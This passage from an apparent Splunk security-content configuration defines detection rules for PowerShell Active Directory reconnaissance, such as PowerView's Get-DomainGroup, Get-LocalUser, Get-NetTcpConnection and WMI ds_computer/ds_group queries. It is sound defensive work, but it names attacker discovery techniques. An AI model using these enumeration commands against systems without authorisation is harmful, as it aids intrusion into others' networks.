["T1069", "T1069.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - GetDomainGroup with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Domain group discovery with PowerView on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetDomainGroup with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetDomainGroup with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-DomainGroup*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getdomaingroup_with_powershell_filter` [ESCU - GetDomainGroup with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainGroup` commandlet. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. As the name suggests, `Get-DomainGroup` is used to query domain groups. Red Teams and adversaries may leverage this function to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainGroup` commandlet. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. As the name suggests, `Get-DomainGroup` is used to query domain groups. Red Teams and adversaries may leverage this function to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerView functions for troubleshooting. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - GetDomainGroup with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Domain group discovery enumeration using PowerView on $Computer$ by $UserID$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetDomainGroup with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainGroup` commandlet. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. As the name suggests, `Get-DomainGroup` is used to query domain groups. Red Teams and adversaries may leverage this function to enumerate domain groups for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetDomainGroup with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-DomainGroup*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getdomaingroup_with_powershell_script_block_filter` [ESCU - GetLocalUser with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for local users. The `Get-LocalUser` commandlet is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for local users. The `Get-LocalUser` commandlet is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2021-08-23 action.escu.modification_date = 2021-08-23 action.escu.confidence = high action.escu.full_search_name = ESCU - GetLocalUser with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetLocalUser with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-LocalUser*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getlocaluser_with_powershell_filter` [ESCU - GetLocalUser with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-LocalUser` commandlet. The `Get-LocalUser` commandlet is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1087", "T1087.001", "T1059.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-LocalUser` commandlet. The `Get-LocalUser` commandlet is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2022-03-22 action.escu.modification_date = 2022-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - GetLocalUser with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery", "Malicious PowerShell"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetLocalUser with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1087", "T1087.001", "T1059.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-LocalUser*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getlocaluser_with_powershell_script_block_filter` [ESCU - GetNetTcpconnection with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line utilized to get a listing of network connections on a compromised system. The `Get-NetTcpConnection` commandlet lists the current TCP connections. Red Teams and adversaries alike may use this commandlet for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line utilized to get a listing of network connections on a compromised system. The `Get-NetTcpConnection` commandlet lists the current TCP connections. Red Teams and adversaries alike may use this commandlet for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - GetNetTcpconnection with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetNetTcpconnection with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-NetTcpConnection*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getnettcpconnection_with_powershell_filter` [ESCU - GetNetTcpconnection with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-NetTcpconnection ` commandlet. This commandlet is used to return a listing of network connections on a compromised system. Red Teams and adversaries alike may use this commandlet for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-NetTcpconnection ` commandlet. This commandlet is used to return a listing of network connections on a compromised system. Red Teams and adversaries alike may use this commandlet for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2022-04-02 action.escu.modification_date = 2022-04-02 action.escu.confidence = high action.escu.full_search_name = ESCU - GetNetTcpconnection with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetNetTcpconnection with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-NetTcpconnection*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getnettcpconnection_with_powershell_script_block_filter` [ESCU - GetWmiObject Ds Computer with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. The `Get-WmiObject` commandlet combined with the `DS_Computer` parameter can be used to return a list of all domain computers. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. The `Get-WmiObject` commandlet combined with the `DS_Computer` parameter can be used to return a list of all domain computers. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-07 action.escu.modification_date = 2021-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - GetWmiObject Ds Computer with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Remote system discovery enumeration using WMI on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 21}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetWmiObject Ds Computer with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. The `Get-WmiObject` commandlet combined with the `DS_Computer` parameter can be used to return a list of all domain computers. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetWmiObject Ds Computer with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-WmiObject* AND Processes.process="*namespace root\\directory\\ldap*" AND Processes.process="*class ds_computer*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_ds_computer_with_powershell_filter` [ESCU - GetWmiObject Ds Computer with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_Computer` class parameter leverages WMI to query for all domain computers. Red Teams and adversaries may leverage this commandlet to enumerate domain computers for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_Computer` class parameter leverages WMI to query for all domain computers. Red Teams and adversaries may leverage this commandlet to enumerate domain computers for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - GetWmiObject Ds Computer with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Remote system discovery enumeration on $Computer$ by $UserID$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetWmiObject Ds Computer with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_Computer` class parameter leverages WMI to query for all domain computers. Red Teams and adversaries may leverage this commandlet to enumerate domain computers for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetWmiObject Ds Computer with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText=*Get-WmiObject* AND ScriptBlockText="*namespace root\\directory\\ldap*" AND ScriptBlockText="*class ds_computer*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getwmiobject_ds_computer_with_powershell_script_block_filter` [ESCU - GetWmiObject Ds Group with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. The `Get-WmiObject` commandlet combined with the `-class ds_group` parameter can be used to return the full list of groups in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. The `Get-WmiObject` commandlet combined with the `-class ds_group` parameter can be used to return the full list of groups in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - GetWmiObject Ds Group with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Domain group discovery enumeration on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetWmiObject Ds Group with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. The `Get-WmiObject` commandlet combined with the `-class ds_group` parameter can be used to return the full list of groups in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetWmiObject Ds Group with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-WmiObject* AND Processes.process="*namespace root\\directory\\ldap*" AND Processes.process="*class ds_group*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_ds_group_with_powershell_filter` [ESCU - GetWmiObject Ds Group with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters . The `DS_Group` parameter leverages WMI to query for all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters . The `DS_Group` parameter leverages WMI to query for all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - GetWmiObject Ds Group with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Domain group discovery enumeration using PowerShell on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetWmiObject Ds Group with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters . The `DS_Group` parameter leverages WMI to query for all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetWmiObject Ds Group with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText=*Get-WmiObject* AND ScriptBlockText="*namespace root\\directory\\ldap*" AND ScriptBlockText="*class ds_group*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`|`getwmiobject_ds_group_with_powershell_script_block_filter` [ESCU - GetWmiObject DS User with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with 